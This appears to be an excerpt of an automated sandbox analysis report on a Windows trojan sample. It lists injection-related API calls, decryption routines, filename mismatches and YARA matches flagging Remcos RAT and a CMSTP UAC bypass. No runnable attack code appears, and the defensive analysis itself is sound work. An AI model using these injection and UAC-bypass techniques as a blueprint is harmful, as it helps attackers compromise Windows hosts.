Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D7A2A NtAllocateVirtualMemory,	0_2_029D7A2A
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_029DDBB0
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A38730 NtQueueApcThread,	10_2_02A38730
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A37A2C NtAllocateVirtualMemory,	10_2_02A37A2C
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A3DD70 NtOpenFile,NtReadFile,NtClose,	10_2_02A3DD70
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A37D78 NtWriteVirtualMemory,	10_2_02A37D78
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A37A2A NtAllocateVirtualMemory,	10_2_02A37A2A
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B8730 NtQueueApcThread,	12_2_029B8730
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B7A2C NtAllocateVirtualMemory,	12_2_029B7A2C
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B7D78 NtWriteVirtualMemory,	12_2_029B7D78
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029BDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	12_2_029BDD70
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B7A2A NtAllocateVirtualMemory,	12_2_029B7A2A
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029BDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	12_2_029BDBB0
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029BDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	12_2_029BDC8C
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029BDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	12_2_029BDC04
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B8D70 GetThreadContext,SetThreadContext,NtResumeThread,	12_2_029B8D70
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029B8D6E GetThreadContext,SetThreadContext,NtResumeThread,	12_2_029B8D6E

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029D8788 CreateProcessAsUserW,

0_2_029D8788

Contains functionality to shutdown / reboot the system

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D67EF ExitWindowsEx,LoadLibraryA,GetProcAddress,	8_2_027D67EF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D67EF ExitWindowsEx,LoadLibraryA,GetProcAddress,	11_2_027D67EF
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,	13_2_028167EF

Detected potential crypto function

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C20C4	0_2_029C20C4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A6671B	0_2_02A6671B
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A6E42F	0_2_02A6E42F
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A7E5FA	0_2_02A7E5FA
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A6E9BE	0_2_02A6E9BE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A9A93B	0_2_02A9A93B
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A94FD9	0_2_02A94FD9
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A7AF67	0_2_02A7AF67
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A6F067	0_2_02A6F067
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A65183	0_2_02A65183
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A6F1D0	0_2_02A6F1D0
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A856AC	0_2_02A856AC
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A9B769	0_2_02A9B769
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A8547D	0_2_02A8547D
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A5B595	0_2_02A5B595
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A85B38	0_2_02A85B38
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A858DB	0_2_02A858DB
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A8D800	0_2_02A8D800
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A7FD80	0_2_02A7FD80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_02806270	8_2_02806270
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_028133AB	8_2_028133AB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027FE34B	8_2_027FE34B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F706A	8_2_027F706A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D4005	8_2_027D4005
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_028141D9	8_2_028141D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027FE11C	8_2_027FE11C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F81E8	8_2_027F81E8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027DF18B	8_2_027DF18B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F87F0	8_2_027F87F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027E742E	8_2_027E742E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F7566	8_2_027F7566
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027FE5A8	8_2_027FE5A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027E7AD7	8_2_027E7AD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_0280DA49	8_2_0280DA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027DDBF3	8_2_027DDBF3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F797E	8_2_027F797E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F39D7	8_2_027F39D7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027FDEED	8_2_027FDEED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F5EEB	8_2_027F5EEB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027E6E9F	8_2_027E6E9F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027E7C40	8_2_027E7C40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F7DB3	8_2_027F7DB3
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 10_2_02A220C4	10_2_02A220C4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_02806270	11_2_02806270
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_028133AB	11_2_028133AB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027FE34B	11_2_027FE34B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F706A	11_2_027F706A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D4005	11_2_027D4005
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_028141D9	11_2_028141D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027FE11C	11_2_027FE11C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F81E8	11_2_027F81E8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027DF18B	11_2_027DF18B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F87F0	11_2_027F87F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027E742E	11_2_027E742E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F7566	11_2_027F7566
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027FE5A8	11_2_027FE5A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027E7AD7	11_2_027E7AD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0280DA49	11_2_0280DA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027DDBF3	11_2_027DDBF3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F797E	11_2_027F797E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F39D7	11_2_027F39D7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027FDEED	11_2_027FDEED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F5EEB	11_2_027F5EEB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027E6E9F	11_2_027E6E9F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027E7C40	11_2_027E7C40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F7DB3	11_2_027F7DB3
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: 12_2_029A20C4	12_2_029A20C4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02846270	13_2_02846270
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028533AB	13_2_028533AB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283E34B	13_2_0283E34B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02814005	13_2_02814005
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283706A	13_2_0283706A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281F18B	13_2_0281F18B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028541D9	13_2_028541D9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028381E8	13_2_028381E8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283E11C	13_2_0283E11C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028387F0	13_2_028387F0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0282742E	13_2_0282742E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283E5A8	13_2_0283E5A8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02837566	13_2_02837566
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02827AD7	13_2_02827AD7
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0284DA49	13_2_0284DA49
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281DBF3	13_2_0281DBF3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028339D7	13_2_028339D7
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283797E	13_2_0283797E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02826E9F	13_2_02826E9F
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02835EEB	13_2_02835EEB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283DEED	13_2_0283DEED
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02827C40	13_2_02827C40
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02837DB3	13_2_02837DB3

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029C4500 appears 33 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029C4860 appears 949 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 02A7C400 appears 45 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029D89D0 appears 45 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029C46D4 appears 244 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029D894C appears 56 times
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: String function: 029C44DC appears 74 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C1FAB appears 38 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C20DF appears 40 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0280854A appears 36 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02805951 appears 56 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C46F7 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02817AA8 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C2213 appears 38 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027D1FA2 appears 32 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C417E appears 46 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C52FD appears 32 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027F4801 appears 82 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C2093 appears 100 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027C1E65 appears 68 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 027F4E70 appears 108 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 02801E65 appears 34 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 02834801 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 02802093 appears 50 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 02834E70 appears 54 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 029A46D4 appears 155 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 029B894C appears 50 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 02A246D4 appears 155 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 02A24860 appears 683 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 029A4860 appears 683 times
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Code function: String function: 02A3894C appears 50 times

Sample file is different than original file name gathered from version info

Source: D2pQ4J4GGZ.exe	Binary or memory string: OriginalFilename vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2175474410.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.0000000021833000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FB1F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FB1F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FD2F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.00000000024C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.00000000024C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.0000000021862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs D2pQ4J4GGZ.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs D2pQ4J4GGZ.exe

Uses 32bit PE files

Source: D2pQ4J4GGZ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
